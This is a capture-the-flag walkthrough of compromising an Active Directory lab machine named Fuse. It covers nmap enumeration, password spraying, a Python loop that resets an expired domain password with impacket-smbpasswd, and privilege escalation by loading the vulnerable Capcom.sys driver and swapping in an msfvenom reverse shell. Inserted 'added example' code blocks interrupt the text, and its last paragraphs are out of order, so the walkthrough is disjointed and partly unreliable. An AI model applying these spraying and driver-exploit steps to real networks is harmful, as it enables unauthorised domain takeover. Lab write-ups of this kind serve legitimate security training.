PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-07T23:37:32
|_ start_date: 2024-01-07T23:30:39
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds
What we can see
Most likely a domain controller, given the presence of DNS (53), Kerberos (88), LDAP (389/636) and the Global Catalog ports (3268/3269)
Windows Server 2016
Domain name: fabricorp.local, which we can add to our hosts file
Host name: FUSE
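An added example (not from the original writeup) that pulls the same conclusions out of the nmap output programmatically: it parses the port table and the smb-os-discovery block, flags the host as a domain controller when Kerberos (88) and LDAP or the Global Catalog (389/3268) are both open, and builds the hosts-file line. The sample input is the scan above, transcribed with the mangled service column on 445/tcp repaired; the DC_PORTS table and the "Kerberos plus LDAP" heuristic are my assumptions, not something nmap reports.

```python
import re

# Sample input: the nmap -sC -sV output from the scan above, trimmed to the
# lines this parser looks at (the service column on 445/tcp is repaired here).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
"""

# Assumption: the set of ports that together make up a DC's signature.
DC_PORTS = {53: "dns", 88: "kerberos", 389: "ldap", 445: "smb", 464: "kpasswd",
            636: "ldaps", 3268: "gc", 3269: "gc-ssl", 9389: "adws"}

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# key/value lines inside NSE script output, e.g. "| Domain name: fabricorp.local"
KV_RE = re.compile(r"^\|_?\s*([A-Za-z ]+?):\s*(.+)$")

def parse_nmap(text):
    """Return the open ports plus the AD facts nmap leaks about the host."""
    info = {"ports": {}, "domain": None, "hostname": None, "fqdn": None, "os": None}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, _, state, service, version = m.groups()
            if state == "open":
                info["ports"][int(port)] = {"service": service, "version": version}
                # the LDAP version string already carries the domain name
                d = re.search(r"Domain:\s*([\w.-]+)", version)
                if d and not info["domain"]:
                    info["domain"] = d.group(1).lower()
            continue
        m = KV_RE.match(line)
        if m:
            key, val = m.group(1).strip().lower(), m.group(2).strip()
            if key == "domain name":
                info["domain"] = val.lower()
            elif key == "computer name":
                info["hostname"] = val
            elif key == "fqdn":
                info["fqdn"] = val.lower()
            elif key == "os":
                info["os"] = val
    return info

def assess(info):
    """Decide whether this looks like a DC and which names belong in /etc/hosts."""
    present = {p: DC_PORTS[p] for p in info["ports"] if p in DC_PORTS}
    # Kerberos plus LDAP (or the Global Catalog) is the tell for a DC; a plain
    # member server exposes SMB/RPC but not 88/389/3268.
    is_dc = 88 in present and (389 in present or 3268 in present)
    names = []
    if info["fqdn"]:
        names.append(info["fqdn"])
    if info["domain"] and info["domain"] not in names:
        names.append(info["domain"])
    if info["hostname"]:
        names.append(info["hostname"].lower())
    return {"is_dc": is_dc, "dc_services": present, "hosts_names": names}

def hosts_line(ip, names):
    """One line ready to append to /etc/hosts."""
    return f"{ip} {' '.join(names)}"

if __name__ == "__main__":
    facts = parse_nmap(NMAP_OUTPUT)
    verdict = assess(facts)
    print("domain controller" if verdict["is_dc"] else "not obviously a DC")
    print(sorted(verdict["dc_services"].values()))
    print(hosts_line("10.10.10.193", verdict["hosts_names"]))
```

Running it prints the DC verdict, the DC services that were seen, and `10.10.10.193 fuse.fabricorp.local fabricorp.local fuse`, which is the hosts entry the next steps rely on.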
Let's see if we can perform a zone transfer, since port 53 (DNS) is open
dig @10.10.10.193 fabricorp.local AXFR
No luck
Let's test for anonymous authentication against the services
SMB
crackmapexec smb 10.10.10.193 -u anonymous -p ''
No luck
LDAP
ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC=local" "(objectClass=person)"
No luck
RPC
rpcclient -N -U anonymous 10.10.10.193
No luck
Let's try the web server
Once the hosts entry is in place and we access the page again, we can see the following
Looking at the print logs we can see several usernames on the system
pmerton
tlavel
sthompson
bhult
administrator
Other than usernames, I can't really find any other interesting information, and we need a set of working creds to progress, so we can use cewl to build a wordlist to try against the usernames we have found
I tried to authenticate to a few services, but no luck
If we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE, meaning we do have valid credentials but the password is expired; we can try to set a new password with a tool like smbpasswd
Now we just need to create a password that matches the password complexity requirements
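As an added example (not part of the original writeup), here is the triage a practitioner applies to spray output before deciding that a run was "no luck": STATUS_LOGON_FAILURE is the only answer that means wrong password; the other NTSTATUS codes in the table below come back only after the password has been verified, so those accounts are valid and merely blocked, and STATUS_ACCOUNT_LOCKED_OUT means stop spraying. The log lines are constructed in crackmapexec's format; which account returns which status is invented for the example (only the usernames come from the print logs, and example.user is a placeholder), as is the status table itself.

```python
import re

# Constructed sample: crackmapexec-style output from spraying one password
# over the usernames from the print logs. Which account gets which status is
# made up for this example; example.user is a placeholder account.
SPRAY_LOG = """\
SMB  10.10.10.193  445  FUSE  [-] fabricorp.local\\pmerton:Fabricorp01 STATUS_LOGON_FAILURE
SMB  10.10.10.193  445  FUSE  [-] fabricorp.local\\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB  10.10.10.193  445  FUSE  [-] fabricorp.local\\sthompson:Fabricorp01 STATUS_LOGON_FAILURE
SMB  10.10.10.193  445  FUSE  [-] fabricorp.local\\bhult:Fabricorp01 STATUS_ACCOUNT_LOCKED_OUT
SMB  10.10.10.193  445  FUSE  [-] fabricorp.local\\administrator:Fabricorp01 STATUS_LOGON_FAILURE
SMB  10.10.10.193  445  FUSE  [+] fabricorp.local\\example.user:ExamplePass1
"""

# NTSTATUS codes an SMB/NTLM logon returns only after the password has been
# checked: the credential is right, the account just cannot log on as-is.
VALID_BUT_BLOCKED = {
    "STATUS_PASSWORD_MUST_CHANGE": "password expired, set a new one with smbpasswd",
    "STATUS_PASSWORD_EXPIRED": "password expired, set a new one with smbpasswd",
    "STATUS_ACCOUNT_DISABLED": "valid password, account disabled",
    "STATUS_ACCOUNT_EXPIRED": "valid password, account expired",
    "STATUS_ACCOUNT_RESTRICTION": "valid password, logon restricted",
    "STATUS_INVALID_LOGON_HOURS": "valid password, outside allowed logon hours",
    "STATUS_INVALID_WORKSTATION": "valid password, not allowed from this host",
    "STATUS_LOGON_TYPE_NOT_GRANTED": "valid password, this logon type not allowed",
}
# Says nothing about the password and tells you to stop before you lock more out.
STOP_SPRAYING = {"STATUS_ACCOUNT_LOCKED_OUT"}

# "[-] domain\user:password STATUS_X" or "[+] domain\user:password"
LINE_RE = re.compile(r"\[(\+|-)\]\s+(\S+?)\\(\S+?):(\S+)(?:\s+(STATUS_\w+))?")

def triage(log_text):
    """Sort spray results into working, valid-but-blocked, locked-out and failed."""
    buckets = {"working": [], "valid_blocked": [], "locked_out": [], "failed": []}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        sign, domain, user, password, status = m.groups()
        cred = f"{domain}\\{user}:{password}"
        if sign == "+":
            buckets["working"].append(cred)
        elif status in VALID_BUT_BLOCKED:
            buckets["valid_blocked"].append((cred, VALID_BUT_BLOCKED[status]))
        elif status in STOP_SPRAYING:
            buckets["locked_out"].append(cred)
        else:
            buckets["failed"].append(cred)
    return buckets

def next_actions(buckets):
    """Turn the buckets into the list of things to do next."""
    actions = [f"use as-is: {c}" for c in buckets["working"]]
    actions += [f"{why}: {c}" for c, why in buckets["valid_blocked"]]
    if buckets["locked_out"]:
        actions.append("lockout observed, pause spraying: " + ", ".join(buckets["locked_out"]))
    return actions

if __name__ == "__main__":
    for action in next_actions(triage(SPRAY_LOG)):
        print(action)
```

The point of the second bucket is the one the writeup makes: a line marked `[-]` is not automatically a failure, and tlavel's STATUS_PASSWORD_MUST_CHANGE is a working credential waiting for a password change.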
shrek123!
It seems the password expires one minute after creation; what we can do is write a basic Python script that automates the password change
import subprocess
import random
import string

def gen_password(length=9):
    # keep drawing until the candidate has at least three of the four
    # character classes the domain complexity policy requires
    chars = string.ascii_letters + string.digits + string.punctuation
    while True:
        password = ''.join(random.choice(chars) for i in range(length))
        classes = [any(c.isupper() for c in password), any(c.islower() for c in password),
                   any(c.isdigit() for c in password), any(not c.isalnum() for c in password)]
        if sum(classes) >= 3:
            return password

def Grabitall():
    new_password = gen_password()
    # subprocess.run with an argument list never goes through a shell, so the
    # password needs no quoting or escaping; escaping it would set a different
    # password from the one we print
    change_pass = [
        '/usr/bin/impacket-smbpasswd',
        'fabricorp/tlavel:Fabricorp01@10.10.10.193',
        '-newpass',
        new_password
    ]
    try:
        # run the command; check=True raises CalledProcessError on a non-zero exit code
        result = subprocess.run(change_pass, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        print(new_password)
    except subprocess.CalledProcessError as e:
        # result is never assigned when run() raises, so read the output from the exception
        print(f'the following error has occurred: {e}')
        print(f'Command output {e.stderr}')

Grabitall()
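An added example (not the writeup's own code) of the check behind "matches the password complexity": the Windows default password filter requires three of the four character classes and also rejects any password that contains the account's sAMAccountName or a token of three or more characters from its displayName (split on space, comma, period, dash, underscore, hash and tab). The minimum length of 7 is the default domain policy value and an assumption here, as is the display name used in the usage call; the generator loops until a candidate passes, which is the guarantee the automation script above needs when it picks a random password.

```python
import re
import secrets
import string

def meets_complexity(password, sam_account_name, display_name="", min_length=7):
    """Windows default password-filter rules; min_length=7 is the default domain policy (assumption)."""
    if len(password) < min_length:
        return False
    classes = [
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    ]
    if sum(classes) < 3:
        return False
    lowered = password.lower()
    # the sAMAccountName may not appear in the password (checked case-insensitively)
    if len(sam_account_name) >= 3 and sam_account_name.lower() in lowered:
        return False
    # displayName is split on the filter's delimiters; tokens shorter than 3 are ignored
    for token in re.split(r"[ ,.\-_#\t]+", display_name):
        if len(token) >= 3 and token.lower() in lowered:
            return False
    return True

def gen_password(sam_account_name, display_name="", length=12):
    """Draw random candidates until one satisfies the policy for this account."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*()-_=+"
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if meets_complexity(candidate, sam_account_name, display_name):
            return candidate

if __name__ == "__main__":
    # "T. Lavel" is an assumed display name for the example, not one read from the domain
    for pw in ("shrek123!", "shrek12", "tlavel123!", "Lavel-99!"):
        print(pw, meets_complexity(pw, "tlavel", "T. Lavel"))
    print(gen_password("tlavel", "T. Lavel"))
```

shrek123! passes (lower, digit, symbol, nine characters); shrek12 fails on classes, and tlavel123! and Lavel-99! fail the name checks even though their character mix is fine, which is the failure mode a purely random generator does not guard against.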
Now that we have our automation script, we can continue enumerating
After we have downloaded the tool (essentially a single C++ file), let's start a new project in VS; in the project window we choose the C++ Console App
Note: when creating a new project with the "Console App" template you may run into an error; to fix this, open the Visual Studio Installer,
click 'Modify' and install the 'Desktop development with C++' workload
After this is installed we should be able to select the Console App template without error
Alright, back to compiling EoPLoadDriver.cpp
Let's start a new project and click 'Next'
In the next window we can specify the name of the project (you can name it whatever you want)
Looking in the project we can see a basic hello world program
Now we can replace the code in EoPLoadDriver.cpp with the code below
After we have copied and pasted the code, we set the configuration to 'Release' and 'x64'
Then we select 'Build' -> 'Build Solution'
Note: if we receive an error on the line #include "stdafx.h", we can just remove that line and it will build
Now we should be able to see the .exe file in the output path shown by the build
Now we can transfer this over to our linux machine
for this i will start a python HTTP server on my windows machine
python.exe -m http.server 80
from our linux machine
wget http://<windows_ip>/EoPLoadDriver.exe
Now we can upload it to the target machine
upload EoPLoadDriver.exe
We also need to upload the Capcom.sys
upload Capcom.sys
Now that we have the vulnerable driver and the loader on the target machine, we can run the same command we saw in the blog post
It looks like it has worked, no error, but we don't have the permissions to check whether the driver is actually running
Next we need to build the actual exploit for our vulnerable driver; we can use the following code
Since this is a .sln file we will need to use Visual Studio on our Windows machine; after we have cloned the repo we can simply double-click the ExploitCapcom.sln file
Let's build the project first to see whether any error occurs before we modify the code
No errors, so we are ready to modify the code slightly; if we look at the LaunchShell function we can see the following
This just opens a cmd prompt, but since we only have remote access to the machine this is pretty pointless. What we will do is generate a reverse shell with msfvenom and drop it on the system; instead of the function executing cmd.exe, we are going to make it execute shrek123.exe, our reverse shell
When we try to navigate to http://fabricorp.local we are redirected, so let's add the fuse subdomain (fuse.fabricorp.local) to our hosts file as well
We will need to compile a few .exe files for the following attack; the best way to compile .exe files is in a Windows VM. To load the vulnerable driver Capcom.sys we will use the following tool from Tarlogic Security